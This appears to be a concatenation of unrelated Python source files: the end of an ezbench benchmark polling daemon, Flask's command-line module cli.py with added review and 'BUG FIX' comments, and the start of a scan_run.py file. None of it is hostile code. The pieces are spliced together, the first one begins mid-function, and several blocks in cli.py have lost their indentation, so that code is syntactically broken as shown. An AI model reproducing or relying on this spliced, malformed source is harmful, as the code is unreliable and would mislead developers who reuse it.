    # serve in a daemon thread so the main polling loop keeps running.
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.daemon = True
    server_thread.start()

    # stash handles on the function object for teardown_htttp_server().
    setup_http_server.server = server
    setup_http_server.server_thread = server_thread
def teardown_htttp_server():
    """Stop and close the status HTTP server started by setup_http_server()."""
    srv = setup_http_server.server
    srv.shutdown()
    srv.server_close()
# Flag polled by the main loop below; flipped by the SIGTERM/SIGINT handler.
stop_requested = False


def stop_handler(signum, frame):
    """Signal handler: ask the main polling loop to exit cleanly."""
    global stop_requested
    stop_requested = True
    print("-- The user requested to abort! --")
    # TODO: Abort faster than after every run


def reload_conf_handler(signum, frame):
    """Signal handler for SIGHUP: reload configuration (not implemented)."""
    # TODO
    return
# parse the options
parser = argparse.ArgumentParser()
parser.add_argument("--embed", action="store_true")
parser.add_argument("--http_server", help="Generate an HTTP interface to show the status of the reports. Format: listen_ip:port")
parser.add_argument("--hook", help="Path to the binary to call when certain events happen.")
args = parser.parse_args()

# Set up the http server
if args.http_server is not None:
    fields = args.http_server.split(":")
    # NOTE(review): assumes exactly "ip:port"; a missing port would raise
    # IndexError/ValueError here — confirm whether that is acceptable.
    setup_http_server(fields[0], int(fields[1]))

# handle the signals systemd asks us to
signal.signal(signal.SIGTERM, stop_handler)
signal.signal(signal.SIGINT, stop_handler)
signal.signal(signal.SIGHUP, reload_conf_handler)

# per-report caches used by the polling loop below.
reportStateModDate = dict()
sbenches = dict()
def sbench_run(report_name):
    """Run schedule_enhancements for one report and regenerate its HTML.

    Executed in a child process (see the polling loop below) because the
    report generation does not release memory well.

    :param report_name: name of the report folder under ezbench logs.
    """
    sbench = SmartEzbench(ezbench_dir, report_name)
    report = sbench.schedule_enhancements()

    # Generate an HTML with the report returned by schedule_enhancements.
    # BUG FIX: time.clock() was deprecated since Python 3.3 and removed in
    # 3.8 (this file targets python3 per its shebang); perf_counter() is the
    # documented replacement for measuring elapsed time.
    clock_start = time.perf_counter()
    compare_reports.reports_to_html([report],
                                    "{}/logs/{}/index.html".format(ezbench_dir, sbench.report_name),
                                    output_unit = "fps",
                                    commit_url = sbench.commit_url(),
                                    verbose = False,
                                    embed = args.embed)
    print("Generated an HTML report in {:.2f} seconds".format(time.perf_counter() - clock_start))
# Main loop: poll for new/changed reports every second until a signal sets
# stop_requested, running each active report and regenerating its HTML.
lastPoll = 0
while not stop_requested:
    futureLastPoll = time.time()
    # only reports modified since the previous poll are returned.
    reports = list_smart_ezbench_report_names(ezbench_dir, lastPoll)
    lastPoll = futureLastPoll
    for report_name in reports:
        try:
            # create the SmartEzbench lazily and cache it across polls.
            if report_name not in sbenches:
                sbench = SmartEzbench(ezbench_dir, report_name, hook_binary_path=args.hook)
                sbenches[report_name] = sbench
            else:
                sbench = sbenches[report_name]

            if sbench.running_mode() == RunningMode.RUN:
                sbench.run()

                # Run the report generation in a separate process because python
                # is really bad at freeing memory
                p = multiprocessing.Process(target=sbench_run,
                                            args=(report_name,))
                p.start()
                p.join()
        except Exception as e:
            # NOTE(review): 'traceback' is not imported explicitly in this
            # file; presumably it arrives via the smartezbench wildcard
            # import — confirm, otherwise this handler itself raises.
            traceback.print_exc(file=sys.stderr)
            sys.stderr.write("\n")
            pass

    # TODO: Replace this by inotify
    time.sleep(1)

# Tear down the http server
if args.http_server is not None:
    teardown_htttp_server()
|
cli.py | import ast
import inspect
import os
import platform
import re
import sys
import traceback
import warnings
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None
class NoAppException(click.UsageError):
    """Raised if an application cannot be found or loaded.

    Subclasses :class:`click.UsageError` so the CLI reports it as a usage
    problem rather than a crash.
    """
def find_best_app(script_info, module):
    """Given a module instance this tries to find the best possible
    application in the module or raises an exception.

    :param script_info: forwarded to :func:`call_factory` for factories.
    :param module: the imported module to search.
    :raises NoAppException: if zero or several candidates are found, or a
        factory cannot be called without arguments.
    """
    from . import Flask

    # Search for the most common names first.
    for attr_name in ("app", "application"):
        app = getattr(module, attr_name, None)

        if isinstance(app, Flask):
            return app

    # Otherwise find the only object that is a Flask instance.
    matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]

    if len(matches) == 1:
        return matches[0]
    elif len(matches) > 1:
        raise NoAppException(
            "Detected multiple Flask applications in module"
            f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
            f" to specify the correct one."
        )

    # Search for app factory functions.
    for attr_name in {"create_app", "make_app"}:
        app_factory = getattr(module, attr_name, None)

        if inspect.isfunction(app_factory):
            try:
                app = call_factory(script_info, app_factory)

                if isinstance(app, Flask):
                    return app
            except TypeError:
                # A TypeError raised inside the factory is a genuine error
                # and must propagate; one from the call itself just means
                # this factory needs arguments we do not have.
                if not _called_with_wrong_args(app_factory):
                    raise

                raise NoAppException(
                    f"Detected factory {attr_name!r} in module {module.__name__!r},"
                    " but could not call it without arguments. Use"
                    f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
                    " to specify arguments."
                )

    raise NoAppException(
        "Failed to find Flask application or factory in module"
        f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
        " to specify one."
    )
def call_factory(script_info, app_factory, args=None, kwargs=None):
    """Takes an app factory, a ``script_info`` object and optionally a tuple
    of arguments. Checks for the existence of a script_info argument and calls
    the app_factory depending on that and the arguments provided.

    :param app_factory: the factory function to call.
    :param args: optional positional arguments for the factory.
    :param kwargs: optional keyword arguments for the factory.
    """
    sig = inspect.signature(app_factory)
    args = [] if args is None else args
    kwargs = {} if kwargs is None else kwargs

    # legacy: inject script_info when the factory explicitly asks for it.
    if "script_info" in sig.parameters:
        warnings.warn(
            "The 'script_info' argument is deprecated and will not be"
            " passed to the app factory function in 2.1.",
            DeprecationWarning,
        )
        kwargs["script_info"] = script_info

    # legacy: a factory with exactly one required parameter used to receive
    # script_info as its single positional argument.
    if (
        not args
        and len(sig.parameters) == 1
        and next(iter(sig.parameters.values())).default is inspect.Parameter.empty
    ):
        warnings.warn(
            "Script info is deprecated and will not be passed as the"
            " single argument to the app factory function in 2.1.",
            DeprecationWarning,
        )
        args.append(script_info)

    return app_factory(*args, **kwargs)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
    """Check if the given string is a variable name or a function. Call
    a function to get the app instance, or return the variable directly.

    :param app_name: either a bare attribute name (``"app"``) or a function
        call whose arguments are Python literals (``"create_app('dev')"``).
    :raises NoAppException: if parsing fails, the attribute is missing, the
        factory call fails, or the result is not a Flask instance.
    """
    from . import Flask

    # Parse app_name as a single expression to determine if it's a valid
    # attribute name or function call.
    try:
        expr = ast.parse(app_name.strip(), mode="eval").body
    except SyntaxError:
        raise NoAppException(
            f"Failed to parse {app_name!r} as an attribute name or function call."
        )

    if isinstance(expr, ast.Name):
        name = expr.id
        args = kwargs = None
    elif isinstance(expr, ast.Call):
        # Ensure the function name is an attribute name only.
        if not isinstance(expr.func, ast.Name):
            raise NoAppException(
                f"Function reference must be a simple name: {app_name!r}."
            )

        name = expr.func.id

        # Parse the positional and keyword arguments as literals.
        try:
            args = [ast.literal_eval(arg) for arg in expr.args]
            kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
        except ValueError:
            # literal_eval gives cryptic error messages, show a generic
            # message with the full expression instead.
            raise NoAppException(
                f"Failed to parse arguments as literal values: {app_name!r}."
            )
    else:
        raise NoAppException(
            f"Failed to parse {app_name!r} as an attribute name or function call."
        )

    try:
        attr = getattr(module, name)
    except AttributeError:
        raise NoAppException(
            f"Failed to find attribute {name!r} in {module.__name__!r}."
        )

    # If the attribute is a function, call it with any args and kwargs
    # to get the real application.
    if inspect.isfunction(attr):
        try:
            app = call_factory(script_info, attr, args, kwargs)
        except TypeError:
            # A TypeError from inside the factory must propagate unchanged.
            if not _called_with_wrong_args(attr):
                raise

            raise NoAppException(
                f"The factory {app_name!r} in module"
                f" {module.__name__!r} could not be called with the"
                " specified arguments."
            )
    else:
        app = attr

    if isinstance(app, Flask):
        return app

    raise NoAppException(
        "A valid Flask application was not obtained from"
        f" '{module.__name__}:{app_name}'."
    )
def prepare_import(path):
    """Resolve *path* to an importable dotted module name.

    Strips a ``.py`` suffix and a trailing ``__init__`` component, walks
    upward while each parent directory contains an ``__init__.py`` (i.e.
    is part of the package), prepends the package root to ``sys.path``
    when it is not already first, and returns the dotted module name.
    """
    real = os.path.realpath(path)

    base, ext = os.path.splitext(real)
    if ext == ".py":
        real = base

    if os.path.basename(real) == "__init__":
        real = os.path.dirname(real)

    # Collect path components from the innermost module outward; inserting
    # at the front keeps them in package order.
    parts = []
    while True:
        real, segment = os.path.split(real)
        parts.insert(0, segment)
        if not os.path.exists(os.path.join(real, "__init__.py")):
            break

    if sys.path[0] != real:
        sys.path.insert(0, real)

    return ".".join(parts)
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
    """Import ``module_name`` and find a Flask app inside it.

    :param app_name: attribute name / factory expression for
        ``find_app_by_string``; when ``None`` the module is searched
        heuristically via ``find_best_app``.
    :param raise_if_not_found: raise ``NoAppException`` when the module
        itself cannot be imported instead of returning ``None``.
    """
    __traceback_hide__ = True  # noqa: F841

    try:
        __import__(module_name)
    except ImportError:
        # Reraise the ImportError if it occurred within the imported module.
        # Determine this by checking whether the trace has a depth > 1.
        if sys.exc_info()[2].tb_next:
            raise NoAppException(
                f"While importing {module_name!r}, an ImportError was"
                f" raised:\n\n{traceback.format_exc()}"
            )
        elif raise_if_not_found:
            raise NoAppException(f"Could not import {module_name!r}.")
        else:
            return

    module = sys.modules[module_name]

    if app_name is None:
        return find_best_app(script_info, module)
    else:
        return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
    """Click callback for ``--version``: print version info and exit.

    Does nothing when the flag is absent or the parser is in resilient
    (completion) mode.
    """
    if not value or ctx.resilient_parsing:
        return

    import werkzeug

    from . import __version__

    lines = (
        f"Python {platform.python_version()}",
        f"Flask {__version__}",
        f"Werkzeug {werkzeug.__version__}",
    )
    click.echo("\n".join(lines), color=ctx.color)
    ctx.exit()
# Reusable, eager ``--version`` option; ``get_version`` runs before any
# command callback and exits the process.
version_option = click.Option(
    ["--version"],
    help="Show the flask version",
    expose_value=False,
    callback=get_version,
    is_flag=True,
    is_eager=True,
)
class DispatchingApp:
    """Special application that dispatches to a Flask application which
    is imported by name in a background thread. If an error happens
    it is recorded and shown as part of the WSGI handling which in case
    of the Werkzeug debugger means that it shows up in the browser.
    """

    def __init__(self, loader, use_eager_loading=None):
        #: Zero-argument callable that returns the real WSGI application.
        self.loader = loader
        self._app = None
        self._lock = Lock()
        self._bg_loading_exc_info = None

        if use_eager_loading is None:
            # Load lazily only in the reloader's child process (where
            # WERKZEUG_RUN_MAIN is set) so import errors surface through
            # the request/debugger instead of killing the watcher.
            use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"

        if use_eager_loading:
            self._load_unlocked()
        else:
            self._load_in_background()

    def _load_in_background(self):
        """Load the app in a worker thread, capturing any exception for
        re-raising on the next request."""

        def _load_app():
            __traceback_hide__ = True  # noqa: F841

            with self._lock:
                try:
                    self._load_unlocked()
                except Exception:
                    self._bg_loading_exc_info = sys.exc_info()

        t = Thread(target=_load_app, args=())
        t.start()

    def _flush_bg_loading_exception(self):
        """Re-raise an exception captured during background loading (once)."""
        __traceback_hide__ = True  # noqa: F841
        exc_info = self._bg_loading_exc_info

        if exc_info is not None:
            self._bg_loading_exc_info = None
            # BUG FIX: previously this was ``raise exc_info``, which raises
            # TypeError because ``sys.exc_info()`` returns a
            # (type, value, traceback) tuple, not an exception. Re-raise
            # the stored exception with its original traceback instead.
            raise exc_info[1].with_traceback(exc_info[2])

    def _load_unlocked(self):
        __traceback_hide__ = True  # noqa: F841
        self._app = rv = self.loader()
        # A successful load invalidates any previously captured error.
        self._bg_loading_exc_info = None
        return rv

    def __call__(self, environ, start_response):
        """WSGI entry point: dispatch to the loaded app, loading it (and
        surfacing any background-load failure) on first use."""
        __traceback_hide__ = True  # noqa: F841

        if self._app is not None:
            return self._app(environ, start_response)

        self._flush_bg_loading_exception()

        with self._lock:
            if self._app is not None:
                rv = self._app
            else:
                rv = self._load_unlocked()

        return rv(environ, start_response)
class ScriptInfo:
    """Helper object to deal with Flask applications. This is usually not
    necessary to interface with as it's used internally in the dispatching
    to click. In future versions of Flask this object will most likely play
    a bigger role. Typically it's created automatically by the
    :class:`FlaskGroup` but you can also manually create it and pass it
    onwards as click object.
    """

    def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
        #: Optionally the import path for the Flask application.
        self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
        #: Optionally a function that is passed the script info to create
        #: the instance of the application.
        self.create_app = create_app
        #: A dictionary with arbitrary data that can be associated with
        #: this script info.
        self.data = {}
        # Whether load_app() should sync app.debug with the environment.
        self.set_debug_flag = set_debug_flag
        # Cache so repeated load_app() calls return the same instance.
        self._loaded_app = None

    def load_app(self):
        """Loads the Flask app (if not yet loaded) and returns it. Calling
        this multiple times will just result in the already loaded app to
        be returned.

        :raises NoAppException: if no application could be located.
        """
        __traceback_hide__ = True  # noqa: F841

        if self._loaded_app is not None:
            return self._loaded_app

        if self.create_app is not None:
            app = call_factory(self, self.create_app)
        else:
            if self.app_import_path:
                # Split "module:attr" on the first colon that is not part
                # of a path (e.g. a Windows drive letter survives).
                path, name = (
                    re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
                )[:2]
                import_name = prepare_import(path)
                app = locate_app(self, import_name, name)
            else:
                # No explicit app given: probe the conventional filenames.
                for path in ("wsgi.py", "app.py"):
                    import_name = prepare_import(path)
                    app = locate_app(self, import_name, None, raise_if_not_found=False)

                    if app:
                        break

        if not app:
            raise NoAppException(
                "Could not locate a Flask application. You did not provide "
                'the "FLASK_APP" environment variable, and a "wsgi.py" or '
                '"app.py" module was not found in the current directory.'
            )

        if self.set_debug_flag:
            # Update the app's debug flag through the descriptor so that
            # other values repopulate as well.
            app.debug = get_debug_flag()

        self._loaded_app = app
        return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
    """Wraps a callback so that it's guaranteed to be executed with the
    script's application context. If callbacks are registered directly
    to the ``app.cli`` object then they are wrapped with this function
    by default unless it's disabled.
    """

    @click.pass_context
    def decorator(__ctx, *args, **kwargs):
        # load_app() is cached on ScriptInfo, so only the first wrapped
        # command pays the import cost; the context is pushed per call.
        with __ctx.ensure_object(ScriptInfo).load_app().app_context():
            return __ctx.invoke(f, *args, **kwargs)

    return update_wrapper(decorator, f)
class AppGroup(click.Group):
    """This works similar to a regular click :class:`~click.Group` but it
    changes the behavior of the :meth:`command` decorator so that it
    automatically wraps the functions in :func:`with_appcontext`.

    Not to be confused with :class:`FlaskGroup`.
    """

    def command(self, *args, **kwargs):
        """Like :meth:`click.Group.command`, but wraps the callback in
        :func:`with_appcontext` unless ``with_appcontext=False`` is passed.
        """
        wrap_for_ctx = kwargs.pop("with_appcontext", True)

        def decorator(f):
            callback = with_appcontext(f) if wrap_for_ctx else f
            return click.Group.command(self, *args, **kwargs)(callback)

        return decorator

    def group(self, *args, **kwargs):
        """Like :meth:`click.Group.group`, but the group class defaults to
        :class:`AppGroup` so nested groups inherit the behavior.
        """
        kwargs.setdefault("cls", AppGroup)
        return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
    """Special subclass of the :class:`AppGroup` group that supports
    loading more commands from the configured Flask app. Normally a
    developer does not have to interface with this class but there are
    some very advanced use cases for which it makes sense to create an
    instance of this. see :ref:`custom-scripts`.

    :param add_default_commands: if this is True then the default run and
        shell commands will be added.
    :param add_version_option: adds the ``--version`` option.
    :param create_app: an optional callback that is passed the script info and
        returns the loaded app.
    :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
        files to set environment variables. Will also change the working
        directory to the directory containing the first file found.
    :param set_debug_flag: Set the app's debug flag based on the active
        environment

    .. versionchanged:: 1.0
        If installed, python-dotenv will be used to load environment variables
        from :file:`.env` and :file:`.flaskenv` files.
    """

    def __init__(
        self,
        add_default_commands=True,
        create_app=None,
        add_version_option=True,
        load_dotenv=True,
        set_debug_flag=True,
        **extra,
    ):
        params = list(extra.pop("params", None) or ())

        if add_version_option:
            params.append(version_option)

        AppGroup.__init__(self, params=params, **extra)
        self.create_app = create_app
        self.load_dotenv = load_dotenv
        self.set_debug_flag = set_debug_flag

        if add_default_commands:
            self.add_command(run_command)
            self.add_command(shell_command)
            self.add_command(routes_command)

        self._loaded_plugin_commands = False

    def _load_plugin_commands(self):
        """Register commands exposed via the ``flask.commands`` entry point,
        exactly once; a missing setuptools silently disables plugins."""
        if self._loaded_plugin_commands:
            return

        try:
            import pkg_resources
        except ImportError:
            self._loaded_plugin_commands = True
            return

        for ep in pkg_resources.iter_entry_points("flask.commands"):
            self.add_command(ep.load(), ep.name)

        self._loaded_plugin_commands = True

    def get_command(self, ctx, name):
        """Look up *name* among built-in/plugin commands first, then among
        the loaded application's own CLI commands."""
        self._load_plugin_commands()
        # We load built-in commands first as these should always be the
        # same no matter what the app does. If the app does want to
        # override this it needs to make a custom instance of this group
        # and not attach the default commands.
        #
        # This also means that the script stays functional in case the
        # application completely fails.
        rv = AppGroup.get_command(self, ctx, name)

        if rv is not None:
            return rv

        info = ctx.ensure_object(ScriptInfo)

        try:
            rv = info.load_app().cli.get_command(ctx, name)

            if rv is not None:
                return rv
        except NoAppException:
            pass

    def list_commands(self, ctx):
        """Return the sorted union of built-in and application commands."""
        self._load_plugin_commands()
        # The commands available is the list of both the application (if
        # available) plus the builtin commands.
        rv = set(click.Group.list_commands(self, ctx))
        info = ctx.ensure_object(ScriptInfo)

        try:
            rv.update(info.load_app().cli.list_commands(ctx))
        except Exception:
            # Here we intentionally swallow all exceptions as we don't
            # want the help page to break if the app does not exist.
            # If someone attempts to use the command we try to create
            # the app again and this will give us the error.
            # However, we will not do so silently because that would confuse
            # users.
            traceback.print_exc()
        return sorted(rv)

    def main(self, *args, **kwargs):
        # Set a global flag that indicates that we were invoked from the
        # command line interface. This is detected by Flask.run to make the
        # call into a no-op. This is necessary to avoid ugly errors when the
        # script that is loaded here also attempts to start a server.
        os.environ["FLASK_RUN_FROM_CLI"] = "true"

        if get_load_dotenv(self.load_dotenv):
            load_dotenv()

        obj = kwargs.get("obj")

        if obj is None:
            obj = ScriptInfo(
                create_app=self.create_app, set_debug_flag=self.set_debug_flag
            )

        kwargs["obj"] = obj
        # Options can also be provided via FLASK_* environment variables.
        kwargs.setdefault("auto_envvar_prefix", "FLASK")
        return super().main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
    """Load "dotenv" files in order of precedence to set environment variables.

    If an env var is already set it is not overwritten, so earlier files in the
    list are preferred over later files.

    Changes the current working directory to the location of the first file
    found, with the assumption that it is in the top level project directory
    and will be where the Python path should import local packages from.

    This is a no-op if `python-dotenv`_ is not installed.

    .. _python-dotenv: https://github.com/theskumar/python-dotenv#readme

    :param path: Load the file at this location instead of searching.
    :return: ``True`` if a file was loaded.

    .. versionchanged:: 1.1.0
        Returns ``False`` when python-dotenv is not installed, or when
        the given path isn't a file.

    .. versionadded:: 1.0
    """
    # ``dotenv`` is a module-level name; when python-dotenv is not
    # installed we only print a hint and bail out.
    if dotenv is None:
        if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
            click.secho(
                " * Tip: There are .env or .flaskenv files present."
                ' Do "pip install python-dotenv" to use them.',
                fg="yellow",
                err=True,
            )

        return False

    # if the given path specifies the actual file then return True,
    # else False
    if path is not None:
        if os.path.isfile(path):
            return dotenv.load_dotenv(path)

        return False

    new_dir = None

    for name in (".env", ".flaskenv"):
        path = dotenv.find_dotenv(name, usecwd=True)

        if not path:
            continue

        # Remember the directory of the first file found; we chdir to it
        # after all files are loaded.
        if new_dir is None:
            new_dir = os.path.dirname(path)

        dotenv.load_dotenv(path)

    if new_dir and os.getcwd() != new_dir:
        os.chdir(new_dir)

    return new_dir is not None  # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
    """Show extra startup messages the first time the server is run,
    ignoring the reloader.
    """
    # The reloader's child process sets WERKZEUG_RUN_MAIN; only the initial
    # process prints the banner.
    if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
        return

    if app_import_path is not None:
        suffix = "" if eager_loading else " (lazy loading)"
        click.echo(f" * Serving Flask app {app_import_path!r}{suffix}")

    click.echo(f" * Environment: {env}")

    if env == "production":
        click.secho(
            " WARNING: This is a development server. Do not use it in"
            " a production deployment.",
            fg="red",
        )
        click.secho(" Use a production WSGI server instead.", dim=True)

    if debug is not None:
        state = "on" if debug else "off"
        click.echo(f" * Debug mode: {state}")
class CertParamType(click.ParamType):
    """Click option type for the ``--cert`` option. Allows either an
    existing file, the string ``'adhoc'``, or an import for a
    :class:`~ssl.SSLContext` object.
    """

    name = "path"

    def __init__(self):
        # Existing-file validator tried first in convert().
        self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)

    def convert(self, value, param, ctx):
        """Convert ``value`` to a resolved path, ``'adhoc'``, or an
        imported ``ssl.SSLContext``.

        :raises click.BadParameter: when SSL support is missing, adhoc
            certs are requested without the cryptography library, or none
            of the three accepted forms matches.
        """
        # ``ssl`` is a module-level name that is None when Python was
        # built without SSL support.
        if ssl is None:
            raise click.BadParameter(
                'Using "--cert" requires Python to be compiled with SSL support.',
                ctx,
                param,
            )

        try:
            return self.path_type(value, param, ctx)
        except click.BadParameter:
            value = click.STRING(value, param, ctx).lower()

            if value == "adhoc":
                try:
                    import cryptography  # noqa: F401
                except ImportError:
                    raise click.BadParameter(
                        "Using ad-hoc certificates requires the cryptography library.",
                        ctx,
                        param,
                    )

                return value

            # Last resort: treat the value as an import path to an
            # SSLContext instance.
            obj = import_string(value, silent=True)

            if isinstance(obj, ssl.SSLContext):
                return obj

            # Re-raise the original path-validation BadParameter.
            raise
def _validate_key(ctx, param, value):
    """The ``--key`` option must be specified when ``--cert`` is a file.
    Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.

    :raises click.BadParameter: when ``--key`` is combined with an adhoc
        or SSLContext cert, is given without ``--cert``, or is missing
        while ``--cert`` is a file.
    """
    cert = ctx.params.get("cert")
    is_adhoc = cert == "adhoc"
    # ``ssl`` may be None when Python was built without SSL support.
    is_context = ssl and isinstance(cert, ssl.SSLContext)

    if value is not None:
        if is_adhoc:
            raise click.BadParameter(
                'When "--cert" is "adhoc", "--key" is not used.', ctx, param
            )

        if is_context:
            # BUG FIX: the message previously read '"--key is not used.'
            # with an unbalanced quote around --key.
            raise click.BadParameter(
                'When "--cert" is an SSLContext object, "--key" is not used.',
                ctx,
                param,
            )

        if not cert:
            raise click.BadParameter('"--cert" must also be specified.', ctx, param)

        # Collapse the pair into the single value werkzeug expects.
        ctx.params["cert"] = cert, value
    else:
        if cert and not (is_adhoc or is_context):
            raise click.BadParameter('Required when using "--cert".', ctx, param)

    return value
class SeparatedPathType(click.Path):
    """Click option type that accepts a list of values separated by the
    OS's path separator (``:``, ``;`` on Windows). Each value is
    validated as a :class:`click.Path` type.
    """

    def convert(self, value, param, ctx):
        """Split ``value`` on the path separator and validate each piece."""
        convert_one = super().convert
        return [
            convert_one(item, param, ctx)
            for item in self.split_envvar_value(value)
        ]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
    "--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
    "--key",
    type=click.Path(exists=True, dir_okay=False, resolve_path=True),
    callback=_validate_key,
    expose_value=False,
    help="The key file to use when specifying a certificate.",
)
@click.option(
    "--reload/--no-reload",
    default=None,
    help="Enable or disable the reloader. By default the reloader "
    "is active if debug is enabled.",
)
@click.option(
    "--debugger/--no-debugger",
    default=None,
    help="Enable or disable the debugger. By default the debugger "
    "is active if debug is enabled.",
)
@click.option(
    "--eager-loading/--lazy-loading",
    default=None,
    help="Enable or disable eager loading. By default eager "
    "loading is enabled if the reloader is disabled.",
)
@click.option(
    "--with-threads/--without-threads",
    default=True,
    help="Enable or disable multithreading.",
)
@click.option(
    "--extra-files",
    default=None,
    type=SeparatedPathType(),
    help=(
        "Extra files that trigger a reload on change. Multiple paths"
        f" are separated by {os.path.pathsep!r}."
    ),
)
@pass_script_info
def run_command(
    info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
    """Run a local development server.

    This server is for development purposes only. It does not provide
    the stability, security, or performance of production WSGI servers.

    The reloader and debugger are enabled by default if
    FLASK_ENV=development or FLASK_DEBUG=1.
    """
    debug = get_debug_flag()

    # Reloader and debugger each follow the debug flag unless explicitly
    # overridden on the command line.
    if reload is None:
        reload = debug

    if debugger is None:
        debugger = debug

    show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
    # DispatchingApp defers the (possibly failing) app import so errors
    # surface through the WSGI handling/debugger instead of killing the CLI.
    app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)

    from werkzeug.serving import run_simple

    run_simple(
        host,
        port,
        app,
        use_reloader=reload,
        use_debugger=debugger,
        threaded=with_threads,
        ssl_context=cert,
        extra_files=extra_files,
    )
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command():
    """Run an interactive Python shell in the context of a given
    Flask application. The application will populate the default
    namespace of this shell according to it's configuration.

    This is useful for executing small snippets of management code
    without having to manually configure the application.
    """
    import code

    from .globals import _app_ctx_stack

    app = _app_ctx_stack.top.app
    banner = (
        f"Python {sys.version} on {sys.platform}\n"
        f"App: {app.import_name} [{app.env}]\n"
        f"Instance: {app.instance_path}"
    )
    ctx = {}

    # Support the regular Python interpreter startup script if someone
    # is using it.
    startup = os.environ.get("PYTHONSTARTUP")

    if startup and os.path.isfile(startup):
        # Executes the user's own startup file into the shell namespace,
        # mirroring what the plain interpreter does with PYTHONSTARTUP.
        with open(startup) as f:
            eval(compile(f.read(), startup, "exec"), ctx)

    ctx.update(app.make_shell_context())

    code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
    "--sort",
    "-s",
    type=click.Choice(("endpoint", "methods", "rule", "match")),
    default="endpoint",
    help=(
        'Method to sort routes by. "match" is the order that Flask will match '
        "routes when dispatching a request."
    ),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
    """Show all registered routes with endpoints and methods."""
    rules = list(current_app.url_map.iter_rules())

    if not rules:
        click.echo("No routes were registered.")
        return

    # HEAD/OPTIONS are implicit on most rules; hide them unless asked.
    ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))

    if sort in ("endpoint", "rule"):
        rules = sorted(rules, key=attrgetter(sort))
    elif sort == "methods":
        rules = sorted(rules, key=lambda rule: sorted(rule.methods))
    # "match" keeps the url_map's own matching order unchanged.

    rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]

    headers = ("Endpoint", "Methods", "Rule")
    # Column widths: widest cell per column, at least the header width.
    widths = (
        max(len(rule.endpoint) for rule in rules),
        max(len(methods) for methods in rule_methods),
        max(len(rule.rule) for rule in rules),
    )
    widths = [max(len(h), w) for h, w in zip(headers, widths)]
    row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)

    click.echo(row.format(*headers).strip())
    click.echo(row.format(*("-" * width for width in widths)))

    for rule, methods in zip(rules, rule_methods):
        click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
    """Invoke the Flask CLI group, adjusting the program name when run
    via ``python -m flask``."""
    # TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
    prog_name = "python -m flask" if as_module else None
    cli.main(args=sys.argv[1:], prog_name=prog_name)


if __name__ == "__main__":
    main(as_module=True)
|
scan_run.py | import os
import multiprocessing
from multiprocessing import Process
# nvidia_smi is an optional dependency used only for GPU discovery; any
# import failure simply disables GPU-aware scheduling below.
try:
    import nvidia_smi
except Exception:
    # BUG FIX: was a bare ``except:``, which also swallowed SystemExit and
    # KeyboardInterrupt raised during import.
    pass

# Required on macOS so fork-based multiprocessing doesn't trip the
# Objective-C runtime's fork-safety check.
os.environ["OBJC_DISABLE_INITIALIZE_FORK_SAFETY"] = "YES"
# NOTE(review): 'fork' is unavailable on Windows and set_start_method raises
# RuntimeError if a start method was already chosen -- confirm intended
# platforms before reuse.
multiprocessing.set_start_method('fork')
def scan_run(self):
